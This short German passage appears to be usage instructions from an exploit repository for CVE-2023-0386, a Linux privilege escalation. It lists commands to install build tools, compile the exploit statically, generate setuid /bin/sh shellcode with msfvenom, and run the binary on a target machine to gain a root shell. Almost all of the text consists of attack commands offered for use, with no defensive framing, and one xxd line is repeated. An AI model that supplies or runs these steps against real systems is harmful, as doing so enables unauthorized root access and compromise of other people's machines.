
CVE-2023-0386 enthält die erforderlichen Laufzeitbibliotheken.
Installieren der Build-Umgebung
sudo apt install -y gcc libfuse-dev pkg-config
Kompilieren des Exploits
gcc -Wall CVE-2023-0386.c `pkg-config fuse --cflags --libs` -D_FILE_OFFSET_BITS=64 -o CVE-2023-0386-exp -static -lfuse
Shellcode generieren
msfvenom -p linux/x86/exec CMD=/bin/sh PrependSetuid=True -f elf -o shellcode.elf && xxd -i -c 8 shellcode.elf
xxd -i -c 8 shellcode.elf
Ausführung auf dem Ziel, es ist nicht erforderlich, dass auf dem Ziel gcc oder andere Entwicklungsumgebungen installiert sind
chmod +x CVE-2023-0386-exp && ./CVE-2023-0386-exp